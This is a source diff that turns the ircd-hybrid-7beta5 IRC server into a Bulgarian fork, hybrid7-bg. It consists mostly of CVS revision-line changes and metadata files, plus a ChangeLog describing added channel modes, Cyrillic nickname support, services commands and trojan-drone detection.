diff -uNrd ircd-hybrid-7beta5/BUGS hybrid7-bg/BUGS
--- ircd-hybrid-7beta5/BUGS	Tue May 15 03:20:36 2001
+++ hybrid7-bg/BUGS	Tue Jun  5 12:35:41 2001
@@ -64,4 +64,4 @@
  with any report  (with passwords and other sensitive information masked).
 
 --------------------------------------------------------------------------------
-$Id: BUGS,v 7.24 2001/05/15 07:20:36 toot Exp $
+$Id: BUGS,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/CVS/Entries hybrid7-bg/CVS/Entries
--- ircd-hybrid-7beta5/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/CVS/Entries	Wed Sep 18 19:19:46 2002
@@ -0,0 +1,25 @@
+/BUGS/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/Hybrid-team/1.4/Wed Jul 10 11:37:44 2002//
+/INSTALL/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/LICENSE/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/README.FIRST/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/README.VMS/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/README.small_nets/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/RELNOTES/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/TODO/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/configure/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/make.com/1.1.1.1/Tue Jun  5 16:35:41 2001//
+D/adns////
+D/autoconf////
+D/contrib////
+D/doc////
+D/gnats////
+D/iauth////
+D/include////
+D/messages////
+D/modules////
+D/src////
+D/tools////
+D/zlib////
+/ChangeLog/1.28/Wed Sep 18 23:19:44 2002//
diff -uNrd ircd-hybrid-7beta5/CVS/Repository hybrid7-bg/CVS/Repository
--- ircd-hybrid-7beta5/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/CVS/Repository	Wed Jul 24 18:31:56 2002
@@ -0,0 +1 @@
+hybrid7-bg
diff -uNrd ircd-hybrid-7beta5/CVS/Root hybrid7-bg/CVS/Root
--- ircd-hybrid-7beta5/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/CVS/Root	Wed Jul 24 18:31:56 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/ChangeLog hybrid7-bg/ChangeLog
--- ircd-hybrid-7beta5/ChangeLog	Thu May 17 22:33:32 2001
+++ hybrid7-bg/ChangeLog	Wed Sep 18 19:19:44 2002
@@ -1,3 +1,172 @@
+*** 20020917_1 by demond
+- minor WATCH fixes (MAXPARA to 32, check on CLIENT)
+- minor +w chanmode fix, setting last_leave on PART
+
+
+*** 20020722_2 by demond
+- implemented WATCH (server notify), code borrowed from bahamut
+- lotsa bugs nailed down
+
+
+*** 20020717_1 by demond
+- raised: MODES=6, TOPICLEN=150, MAXBANS=40
+- word subst mode now allows '$' instead of space
+- fixed numerous annoying bugs
+
+
+*** 20020709_1 by demond
+- implemented chanmode +w (word substitutions)
+- implemented chanmode +z (no repeating allowed)
+- cosmetic fixes
+
+
+*** 20020622_2 by demond
+- now showing realhosts in rconn notices
+- filtering out URL spam from part comments
+- checking for services source in m_svshint.c
+- implemented anti-spam onjoin/onleave muting period 
+- introduced CONF server command for remote configuration
+- prohibition to kick/deop services bots
+
+
+*** 20020610_1 by demond
+- resolved remote client notices on burst issue
+- added IsRelay() check on +q notices
+- added drone_reason conf option
+- ISON now also triggers known client flag
+
+
+*** 20020609_2 by demond
+- introduced NICK/CLIENT IP relay, CAP IP 
+- remote client connection notices on umode +q
+- added immediate/batch trojan drone kline
+
+
+*** 20020601_1 by demond
+- added trojan drone ckecking
+- added conf block userpar{} for defining certain clients
+- now zapping URL spam from QUITs
+
+
+*** 20020222_2 by demond
+- fixed numeric reply 298 (WHOIS nick in cyrillic)
+- fixed irccmp() lookup tables to support cyrillic (Windows-1251)
+- added marking of translated cyrnicks in sendto_channel
+
+
+*** 20020216_1 by demond
+- ircd now sets its own corefile size 
+- introduced chanmode +C (no nicks in cyrillic allowed to join)
+- introduced relays{} conf block, describing which pseudo servers
+  are to be ignored on certain notices (server split/rejoin)
+
+
+*** 20011207_1 by demond
+- implemented chanmode +x: queueing all JOIN, PART, PRIVMSG
+  NICK and QUIT notifications to the channel and flushing the
+  queues through hybrid7 event system 
+- moved all nick collision kill notices to FLAGS_SKILL
+
+
+*** 20011202_1 by demond
+- implemented +M chanmode (only reg nicks may speak on channel)
+- implemented +R usermode (accept msgs from reg nicks only)
+- now not allowing mixed cyr/lat nicknames, indicating cyr nick
+  with a WHOIS numeric
+
+
+*** 20011104_2 by demond
+- fixed minor u@h spoof bug
+
+
+*** 20011104_1 by demond
+- netid now configurable, defaults to "bnet" if not specified
+- username@host can be given for spoofing
+- more efficient services lookup algorithm
+- cyrillic is allowed in nicks & usernames as configurable option
+
+
+*** 20010909_1 by demond
+- implemented +r and +R chanmodes (registered and reg nicks only channels)
+
+
+*** 20010908_3 by demond
+- fixed modules/Makefile.in, now creating autoload dir before installing files
+- now relaying TOPIC on burst_all() and checking topic TS on ms_topic()
+- removed restart_resolver() on REHASH, coredumps if theres no /etc/resolv.conf
+
+
+*** 20010908_2 by demond
+- now reseting FLAGS_SVS_IDENT on nick change
+- SVSHINT with no args resets all svsflags on all clients
+- no showing svsflags on WHOIS if services not present
+
+
+*** 20010908_1 by demond
+- fixed MODE_NOCOLOR omission in m_sjoin.c handler
+- fixed svshint_msgtab[] omission in modules.c (static linking)
+
+
+*** 20010828_1 by demond
+- implemented relaying of client svsflags field (bundled with hopcount :)
+
+
+*** 20010827_1 by demond
+- changed "identified" & "logged" WHOIS numerics... damn BitchX
+
+
+*** 20010826_1 by demond
+- implemented SVSHINT command for relaying services status flags
+
+
+*** 20010716_1 by demond
+- fixed realhost relay omission; fixed color stripping,
+  now will handle mIRC and ANSI colors correctly
+
+
+*** 20010712_1 by demond
+- implemented equivalent {} conf block; we now use it
+  for defining which nicks (in pairs) are to be treated 
+  as equivalent; STATS Y will show those
+
+
+*** 20010708_2 by demond
+- implemented services{} conf block, for services that are
+  to be treated specially; now SVSNICK accepted from services only;
+  WHOIS doesnt show channels that services clients are on
+
+
+*** 20010708_1 by demond
+- implemented SVSNICK command, change local client nick
+  by remote server (services) command
+
+
+*** 20010706_1 by demond
+- fixed color_strip() omission in m_part.c
+
+
+*** 20010705_1 by demond
+- fixed realhost logging in the userlog file
+
+
+*** 20010701_1 by demond
+- added skip_on_fail auth{} block option (yes/no) causing
+  aconf matching to skip this block if password check failed
+
+
+*** 20010625_1 by demond
+- fixed cyrillic translation in m_message on client
+
+
+*** 20010621 by demond
+- implemented cyrillic character translation (accessible
+  through 2 new usermodes: +T for Windows-1251 and +Y for ISO-8859-5
+
+
+*** 20010517_11-bg by demond
+- implemented hostname cloaking and no-color chanmode +c
+
+
 *** 20010517_11 by lusky
 - revved patchlevel to beta5
 
diff -uNrd ircd-hybrid-7beta5/Hybrid-team hybrid7-bg/Hybrid-team
--- ircd-hybrid-7beta5/Hybrid-team	Tue Apr 24 23:55:14 2001
+++ hybrid7-bg/Hybrid-team	Wed Jul 10 07:37:44 2002
@@ -1,4 +1,4 @@
-$Id: Hybrid-team,v 7.30 2001/04/25 03:55:14 habeeb Exp $
+$Id: Hybrid-team,v 1.4 2002/07/10 11:37:44 Administrator Exp $
  
 The hybrid team is a group of ircd coders who were frustrated
 with the instability and all-out "dirtiness" of the EFnet ircd's
@@ -55,3 +55,7 @@
  
 Send bug fixes/complaints/rotten tomatoes to ircd-hybrid@the-project.org.
 http://bugs.efnow.net may be worth a visit first.
+ 
+This particular hybrid7 version was developed by demond <demond@gmx.net>
+and is dedicated to BulgariaNet's PR girl ylith, sweet and compassionate.
+ 
diff -uNrd ircd-hybrid-7beta5/INSTALL hybrid7-bg/INSTALL
--- ircd-hybrid-7beta5/INSTALL	Sat May  5 09:46:23 2001
+++ hybrid7-bg/INSTALL	Tue Jun  5 12:35:41 2001
@@ -130,4 +130,4 @@
 This may be kludged in the future.
 
 --------------------------------------------------------------------------------
-$Id: INSTALL,v 7.14 2001/05/05 13:46:23 fl_ Exp $
+$Id: INSTALL,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/LICENSE hybrid7-bg/LICENSE
--- ircd-hybrid-7beta5/LICENSE	Fri Oct  6 00:26:47 2000
+++ hybrid7-bg/LICENSE	Tue Jun  5 12:35:41 2001
@@ -1,4 +1,4 @@
-$Id: LICENSE,v 7.2 2000/10/06 04:26:47 lusky Exp $
+$Id: LICENSE,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
 
 		    GNU GENERAL PUBLIC LICENSE
 		     Version 1, February 1989
@@ -250,4 +250,4 @@
 That's all there is to it!
 
 --
-$Id: LICENSE,v 7.2 2000/10/06 04:26:47 lusky Exp $
+$Id: LICENSE,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/README.FIRST hybrid7-bg/README.FIRST
--- ircd-hybrid-7beta5/README.FIRST	Thu Apr 26 03:53:32 2001
+++ hybrid7-bg/README.FIRST	Tue Jun  5 12:35:41 2001
@@ -88,4 +88,4 @@
 - Other files recommended for reading: BUGS, README.FIRST, INSTALL
 
 --------------------------------------------------------------------------------
-$Id: README.FIRST,v 7.16 2001/04/26 07:53:32 kreator Exp $
+$Id: README.FIRST,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/README.VMS hybrid7-bg/README.VMS
--- ircd-hybrid-7beta5/README.VMS	Fri Jan 19 02:20:23 2001
+++ hybrid7-bg/README.VMS	Tue Jun  5 12:35:41 2001
@@ -16,4 +16,4 @@
 [.modules]*.obj;*. It's not installed automatically yet, you'll
 have to copy it to IRCD_PREFIX by hand.
 
-$Id: README.VMS,v 1.3 2001/01/19 07:20:23 ejb Exp $
+$Id: README.VMS,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/README.small_nets hybrid7-bg/README.small_nets
--- ircd-hybrid-7beta5/README.small_nets	Wed Jan 24 09:58:34 2001
+++ hybrid7-bg/README.small_nets	Tue Jun  5 12:35:41 2001
@@ -53,4 +53,4 @@
   - Dianora
 
 --------------------------------------------------------------------------------
-$Id: README.small_nets,v 7.4 2001/01/24 14:58:34 wcampbel Exp $
+$Id: README.small_nets,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/RELNOTES hybrid7-bg/RELNOTES
--- ircd-hybrid-7beta5/RELNOTES	Wed Jan 24 09:58:34 2001
+++ hybrid7-bg/RELNOTES	Tue Jun  5 12:35:41 2001
@@ -42,4 +42,4 @@
   *************************************************************************
 
 --------------------------------------------------------------------------------
-$Id: RELNOTES,v 1.8 2001/01/24 14:58:34 wcampbel Exp $
+$Id: RELNOTES,v 1.1.1.1 2001/06/05 16:35:41 demond Exp $
diff -uNrd ircd-hybrid-7beta5/adns/CVS/Entries hybrid7-bg/adns/CVS/Entries
--- ircd-hybrid-7beta5/adns/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/adns/CVS/Entries	Wed Jul 24 18:31:57 2002
@@ -0,0 +1,20 @@
+/.depend/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/COPYING/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/GPL-vs-LGPL/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:41 2001//
+/README.ircd/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/adns.h/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/check.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/dlist.h/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/event.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/general.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/internal.h/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/parse.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/query.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/reply.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/setup.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/transmit.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/tvarith.h/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/types.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+D
diff -uNrd ircd-hybrid-7beta5/adns/CVS/Repository hybrid7-bg/adns/CVS/Repository
--- ircd-hybrid-7beta5/adns/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/adns/CVS/Repository	Wed Jul 24 18:31:56 2002
@@ -0,0 +1 @@
+hybrid7-bg/adns
diff -uNrd ircd-hybrid-7beta5/adns/CVS/Root hybrid7-bg/adns/CVS/Root
--- ircd-hybrid-7beta5/adns/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/adns/CVS/Root	Wed Jul 24 18:31:56 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/adns/adns.h hybrid7-bg/adns/adns.h
--- ircd-hybrid-7beta5/adns/adns.h	Sun Feb 25 03:41:01 2001
+++ hybrid7-bg/adns/adns.h	Tue Jun  5 12:35:42 2001
@@ -51,7 +51,7 @@
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  *
  *
- *  $Id: adns.h,v 1.4 2001/02/25 08:41:01 androsyn Exp $
+ *  $Id: adns.h,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #ifndef ADNS_H_INCLUDED
diff -uNrd ircd-hybrid-7beta5/adns/check.c hybrid7-bg/adns/check.c
--- ircd-hybrid-7beta5/adns/check.c	Wed Feb 14 00:53:08 2001
+++ hybrid7-bg/adns/check.c	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: check.c,v 1.3 2001/02/14 05:53:08 toot Exp $
+ * $Id: check.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include "fileio.h"
diff -uNrd ircd-hybrid-7beta5/adns/dlist.h hybrid7-bg/adns/dlist.h
--- ircd-hybrid-7beta5/adns/dlist.h	Wed Feb 14 00:53:09 2001
+++ hybrid7-bg/adns/dlist.h	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: dlist.h,v 1.3 2001/02/14 05:53:09 toot Exp $
+ * $Id: dlist.h,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #ifndef ADNS_DLIST_H_INCLUDED
diff -uNrd ircd-hybrid-7beta5/adns/event.c hybrid7-bg/adns/event.c
--- ircd-hybrid-7beta5/adns/event.c	Fri Apr  6 05:30:36 2001
+++ hybrid7-bg/adns/event.c	Tue Jun  5 12:35:42 2001
@@ -26,7 +26,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: event.c,v 1.10 2001/04/06 09:30:36 a1kmm Exp $
+ * $Id: event.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include <errno.h>
diff -uNrd ircd-hybrid-7beta5/adns/general.c hybrid7-bg/adns/general.c
--- ircd-hybrid-7beta5/adns/general.c	Mon Feb 26 12:27:25 2001
+++ hybrid7-bg/adns/general.c	Tue Jun  5 12:35:42 2001
@@ -25,7 +25,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: general.c,v 1.9 2001/02/26 17:27:25 androsyn Exp $
+ * $Id: general.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include "fileio.h"
diff -uNrd ircd-hybrid-7beta5/adns/internal.h hybrid7-bg/adns/internal.h
--- ircd-hybrid-7beta5/adns/internal.h	Fri Apr  6 05:30:36 2001
+++ hybrid7-bg/adns/internal.h	Tue Jun  5 12:35:42 2001
@@ -26,7 +26,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  *
- * $Id: internal.h,v 1.7 2001/04/06 09:30:36 a1kmm Exp $
+ * $Id: internal.h,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #ifndef ADNS_INTERNAL_H_INCLUDED
diff -uNrd ircd-hybrid-7beta5/adns/parse.c hybrid7-bg/adns/parse.c
--- ircd-hybrid-7beta5/adns/parse.c	Mon Feb 26 12:27:25 2001
+++ hybrid7-bg/adns/parse.c	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: parse.c,v 1.4 2001/02/26 17:27:25 androsyn Exp $
+ * $Id: parse.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include "fileio.h"
diff -uNrd ircd-hybrid-7beta5/adns/query.c hybrid7-bg/adns/query.c
--- ircd-hybrid-7beta5/adns/query.c	Fri Apr 20 01:41:23 2001
+++ hybrid7-bg/adns/query.c	Tue Jun  5 12:35:42 2001
@@ -26,7 +26,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: query.c,v 1.10 2001/04/20 05:41:23 androsyn Exp $
+ * $Id: query.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include "memory.h"
diff -uNrd ircd-hybrid-7beta5/adns/reply.c hybrid7-bg/adns/reply.c
--- ircd-hybrid-7beta5/adns/reply.c	Fri Apr  6 05:30:37 2001
+++ hybrid7-bg/adns/reply.c	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: reply.c,v 1.6 2001/04/06 09:30:37 a1kmm Exp $
+ * $Id: reply.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include <stdlib.h>
diff -uNrd ircd-hybrid-7beta5/adns/setup.c hybrid7-bg/adns/setup.c
--- ircd-hybrid-7beta5/adns/setup.c	Fri Apr  6 05:30:37 2001
+++ hybrid7-bg/adns/setup.c	Tue Jun  5 12:35:42 2001
@@ -25,7 +25,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: setup.c,v 1.19 2001/04/06 09:30:37 a1kmm Exp $
+ * $Id: setup.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include <stdlib.h>
diff -uNrd ircd-hybrid-7beta5/adns/transmit.c hybrid7-bg/adns/transmit.c
--- ircd-hybrid-7beta5/adns/transmit.c	Fri Apr 20 01:41:23 2001
+++ hybrid7-bg/adns/transmit.c	Tue Jun  5 12:35:42 2001
@@ -25,7 +25,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: transmit.c,v 1.4 2001/04/20 05:41:23 androsyn Exp $
+ * $Id: transmit.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include <errno.h>
diff -uNrd ircd-hybrid-7beta5/adns/tvarith.h hybrid7-bg/adns/tvarith.h
--- ircd-hybrid-7beta5/adns/tvarith.h	Fri Apr  6 05:30:37 2001
+++ hybrid7-bg/adns/tvarith.h	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  *
- * $Id: tvarith.h,v 1.3 2001/04/06 09:30:37 a1kmm Exp $
+ * $Id: tvarith.h,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #ifndef ADNS_TVARITH_H_INCLUDED
diff -uNrd ircd-hybrid-7beta5/adns/types.c hybrid7-bg/adns/types.c
--- ircd-hybrid-7beta5/adns/types.c	Mon Feb 26 12:27:26 2001
+++ hybrid7-bg/adns/types.c	Tue Jun  5 12:35:42 2001
@@ -24,7 +24,7 @@
  *  along with this program; if not, write to the Free Software Foundation,
  *  Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 
  *
- * $Id: types.c,v 1.5 2001/02/26 17:27:26 androsyn Exp $
+ * $Id: types.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include <stdlib.h>
diff -uNrd ircd-hybrid-7beta5/autoconf/CVS/Entries hybrid7-bg/autoconf/CVS/Entries
--- ircd-hybrid-7beta5/autoconf/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/autoconf/CVS/Entries	Wed Jul 24 18:31:57 2002
@@ -0,0 +1,4 @@
+/acconfig.h/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/configure.in/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/install-sh/1.1.1.1/Tue Jun  5 16:35:42 2001//
+D
diff -uNrd ircd-hybrid-7beta5/autoconf/CVS/Repository hybrid7-bg/autoconf/CVS/Repository
--- ircd-hybrid-7beta5/autoconf/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/autoconf/CVS/Repository	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+hybrid7-bg/autoconf
diff -uNrd ircd-hybrid-7beta5/autoconf/CVS/Root hybrid7-bg/autoconf/CVS/Root
--- ircd-hybrid-7beta5/autoconf/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/autoconf/CVS/Root	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/autoconf/acconfig.h hybrid7-bg/autoconf/acconfig.h
--- ircd-hybrid-7beta5/autoconf/acconfig.h	Sat May  5 20:04:50 2001
+++ hybrid7-bg/autoconf/acconfig.h	Tue Jun  5 12:35:42 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: acconfig.h,v 7.12 2001/05/06 00:04:50 androsyn Exp $
+ * $Id: acconfig.h,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 /* Define if you have the poll() system call.  */
diff -uNrd ircd-hybrid-7beta5/autoconf/configure.in hybrid7-bg/autoconf/configure.in
--- ircd-hybrid-7beta5/autoconf/configure.in	Mon May  7 19:51:05 2001
+++ hybrid7-bg/autoconf/configure.in	Tue Jun  5 12:35:42 2001
@@ -1,4 +1,4 @@
-dnl $Id: configure.in,v 7.54 2001/05/07 23:51:05 androsyn Exp $
+dnl $Id: configure.in,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
 dnl Process this file with autoconf to produce a configure script.
 AC_INIT(include/class.h)
 
diff -uNrd ircd-hybrid-7beta5/autoconf/install-sh hybrid7-bg/autoconf/install-sh
--- ircd-hybrid-7beta5/autoconf/install-sh	Wed Aug 25 23:36:21 1999
+++ hybrid7-bg/autoconf/install-sh	Tue Jun  5 12:35:42 2001
@@ -1,5 +1,5 @@
 #! /bin/sh
-# $Id: install-sh,v 7.1 1999/08/26 03:36:21 lusky Exp $
+# $Id: install-sh,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
 # install - install a program, script, or datafile
 # This comes from X11R5 (mit/util/scripts/install.sh).
 #
diff -uNrd ircd-hybrid-7beta5/contrib/CVS/Entries hybrid7-bg/contrib/CVS/Entries
--- ircd-hybrid-7beta5/contrib/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/contrib/CVS/Entries	Wed Jul 24 18:31:57 2002
@@ -0,0 +1,13 @@
+/.depend/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/README.HASH/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/links_notice.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/m_clearchan.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/m_hash.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/m_jupe.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/m_nickinfo.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/m_opme.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/stats_notice.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/whois_notice.c/1.1.1.1/Tue Jun  5 16:35:42 2001//
+D
diff -uNrd ircd-hybrid-7beta5/contrib/CVS/Repository hybrid7-bg/contrib/CVS/Repository
--- ircd-hybrid-7beta5/contrib/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/contrib/CVS/Repository	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+hybrid7-bg/contrib
diff -uNrd ircd-hybrid-7beta5/contrib/CVS/Root hybrid7-bg/contrib/CVS/Root
--- ircd-hybrid-7beta5/contrib/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/contrib/CVS/Root	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/contrib/m_clearchan.c hybrid7-bg/contrib/m_clearchan.c
--- ircd-hybrid-7beta5/contrib/m_clearchan.c	Mon May 14 06:08:47 2001
+++ hybrid7-bg/contrib/m_clearchan.c	Tue Jun  5 12:35:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_clearchan.c,v 1.16 2001/05/14 10:08:47 toot Exp $
+ *   $Id: m_clearchan.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/contrib/m_hash.c hybrid7-bg/contrib/m_hash.c
--- ircd-hybrid-7beta5/contrib/m_hash.c	Wed May 16 04:50:56 2001
+++ hybrid7-bg/contrib/m_hash.c	Tue Jun  5 12:35:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_hash.c,v 1.5 2001/05/16 08:50:56 toot Exp $
+ *   $Id: m_hash.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/contrib/m_jupe.c hybrid7-bg/contrib/m_jupe.c
--- ircd-hybrid-7beta5/contrib/m_jupe.c	Thu Mar 15 14:14:02 2001
+++ hybrid7-bg/contrib/m_jupe.c	Tue Jun  5 12:35:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_jupe.c,v 1.13 2001/03/15 19:14:02 fl_ Exp $
+ *   $Id: m_jupe.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 /*
diff -uNrd ircd-hybrid-7beta5/contrib/m_nickinfo.c hybrid7-bg/contrib/m_nickinfo.c
--- ircd-hybrid-7beta5/contrib/m_nickinfo.c	Wed May 16 04:50:56 2001
+++ hybrid7-bg/contrib/m_nickinfo.c	Tue Jun  5 12:35:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_nickinfo.c,v 1.5 2001/05/16 08:50:56 toot Exp $
+ *   $Id: m_nickinfo.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/contrib/m_opme.c hybrid7-bg/contrib/m_opme.c
--- ircd-hybrid-7beta5/contrib/m_opme.c	Mon Mar  5 21:24:29 2001
+++ hybrid7-bg/contrib/m_opme.c	Tue Jun  5 12:35:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_opme.c,v 1.10 2001/03/06 02:24:29 androsyn Exp $
+ *   $Id: m_opme.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/contrib/stats_notice.c hybrid7-bg/contrib/stats_notice.c
--- ircd-hybrid-7beta5/contrib/stats_notice.c	Sun Apr 29 10:23:36 2001
+++ hybrid7-bg/contrib/stats_notice.c	Tue Jun  5 12:35:42 2001
@@ -1,6 +1,6 @@
 /* copyright (c) 2000 Edward Brocklesby, Hybrid Development Team */
 /*
- * $Id: stats_notice.c,v 1.5 2001/04/29 14:23:36 fl_ Exp $
+ * $Id: stats_notice.c,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
  */
 
 #include "modules.h"
